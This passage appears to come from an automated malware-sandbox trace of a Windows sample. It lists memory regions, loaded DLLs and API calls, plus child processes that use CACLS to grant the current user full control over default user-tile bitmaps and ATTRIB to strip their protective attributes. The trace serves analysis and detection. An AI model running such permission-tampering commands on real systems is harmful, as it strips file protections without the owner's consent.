filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27010 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27011 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27012 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27013 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 27014 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27015 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27016 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27017 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27018 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 27019 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 27020 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27021 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27022 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27023 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27024 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27025 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27026 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 559 os_tid = 0xd58 Thread: id = 560 os_tid = 0xfa0 Process: id = "393" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c40" os_pid = "0x8e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "391" os_parent_pid = "0xefc" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], 
"BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27027 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27028 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27029 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27030 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 27031 start_va = 0x280000 end_va = 0x286fff entry_point = 0x280000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27032 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27033 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27034 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27035 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27036 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 
region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27037 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27038 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27039 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27040 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 27041 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 27042 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27043 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27044 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27045 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27046 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 
"c:\\windows\\system32\\kernel32.dll") Region: id = 27047 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27048 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27049 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27050 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27051 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27052 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27053 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27054 start_va = 0x160000 end_va = 0x227fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 27055 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27056 start_va = 0x76ca0000 end_va = 
0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 561 os_tid = 0xe8c Process: id = "394" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0x924" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27057 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27058 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 27059 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 27060 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 27061 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: 
"c:\\windows\\system32\\cmd.exe") Region: id = 27062 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27063 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27064 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27065 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 27066 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27067 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27068 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27069 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27070 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 27071 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 27072 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: 
"c:\\windows\\system32\\winbrand.dll") Region: id = 27073 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27074 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27075 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27076 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27077 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27078 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27079 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27080 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27081 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 27082 start_va = 0x76490000 end_va = 
0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27083 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27084 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 27085 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 27086 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 27087 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 27088 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 27089 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 27090 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 27091 start_va = 0x12a0000 end_va = 0x156efff entry_point = 0x12a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 562 os_tid = 0x670 [0187.410] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fe3c | out: lpSystemTimeAsFileTime=0x12fe3c*(dwLowDateTime=0xa49ad440, dwHighDateTime=0x1d440a9)) [0187.410] GetCurrentProcessId () returned 0x924 [0187.410] 
GetCurrentThreadId () returned 0x670 [0187.410] GetTickCount () returned 0x357fe [0187.410] QueryPerformanceCounter (in: lpPerformanceCount=0x12fe34 | out: lpPerformanceCount=0x12fe34*=24419948333) returned 1 [0187.411] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0187.411] __set_app_type (_Type=0x1) [0187.411] __p__fmode () returned 0x76b331f4 [0187.411] __p__commode () returned 0x76b331fc [0187.411] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0187.411] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0187.411] GetCurrentThreadId () returned 0x670 [0187.411] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x670) returned 0x38 [0187.411] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0187.411] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0187.411] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.412] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0187.412] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fdcc | out: phkResult=0x12fdcc*=0x0) returned 0x2 [0187.412] VirtualQuery (in: lpAddress=0x12fe03, lpBuffer=0x12fd9c, dwLength=0x1c | out: lpBuffer=0x12fd9c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.412] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fd9c, dwLength=0x1c | out: lpBuffer=0x12fd9c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0187.412] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fd9c, dwLength=0x1c | out: 
lpBuffer=0x12fd9c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0187.412] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fd9c, dwLength=0x1c | out: lpBuffer=0x12fd9c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.412] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fd9c, dwLength=0x1c | out: lpBuffer=0x12fd9c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0187.412] GetConsoleOutputCP () returned 0x1b5 [0187.412] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.412] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0187.412] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.412] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0187.412] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.412] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0187.412] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.412] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0187.413] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.413] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0187.413] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.413] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0187.413] GetEnvironmentStringsW () returned 0x260308* [0187.413] FreeEnvironmentStringsW (penv=0x260308) returned 1 [0187.413] GetEnvironmentStringsW () returned 0x260308* [0187.413] FreeEnvironmentStringsW (penv=0x260308) returned 1 [0187.413] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ed3c | out: 
phkResult=0x12ed3c*=0x40) returned 0x0 [0187.413] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x0, lpData=0x12ed48*=0xb8, lpcbData=0x12ed40*=0x1000) returned 0x2 [0187.413] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x4, lpData=0x12ed48*=0x1, lpcbData=0x12ed40*=0x4) returned 0x0 [0187.413] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x0, lpData=0x12ed48*=0x1, lpcbData=0x12ed40*=0x1000) returned 0x2 [0187.413] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x4, lpData=0x12ed48*=0x0, lpcbData=0x12ed40*=0x4) returned 0x0 [0187.413] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x4, lpData=0x12ed48*=0x40, lpcbData=0x12ed40*=0x4) returned 0x0 [0187.414] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x4, lpData=0x12ed48*=0x40, lpcbData=0x12ed40*=0x4) returned 0x0 [0187.414] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x0, lpData=0x12ed48*=0x40, lpcbData=0x12ed40*=0x1000) returned 0x2 [0187.414] RegCloseKey (hKey=0x40) returned 0x0 [0187.414] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ed3c | out: phkResult=0x12ed3c*=0x40) returned 0x0 [0187.414] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x0, lpData=0x12ed48*=0x40, lpcbData=0x12ed40*=0x1000) returned 0x2 [0187.414] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x4, lpData=0x12ed48*=0x1, lpcbData=0x12ed40*=0x4) returned 0x0 [0187.414] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x0, lpData=0x12ed48*=0x1, lpcbData=0x12ed40*=0x1000) returned 0x2 [0187.414] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x4, lpData=0x12ed48*=0x0, lpcbData=0x12ed40*=0x4) returned 0x0 [0187.414] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x4, lpData=0x12ed48*=0x9, lpcbData=0x12ed40*=0x4) returned 0x0 [0187.414] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x4, lpData=0x12ed48*=0x9, lpcbData=0x12ed40*=0x4) returned 0x0 [0187.414] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x0, lpData=0x12ed48*=0x9, lpcbData=0x12ed40*=0x1000) returned 0x2 [0187.414] RegCloseKey (hKey=0x40) returned 0x0 [0187.414] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886395 [0187.414] srand (_Seed=0x5b886395) [0187.414] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\" /E /G %USERNAME%:F /C & 
ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\"" [0187.414] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\"" [0187.414] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.414] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x261a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0187.415] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.415] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.415] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0187.415] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0187.415] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0187.415] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0187.415] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0187.415] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0187.415] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0187.415] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0187.415] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0187.415] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0187.415] GetEnvironmentStringsW () 
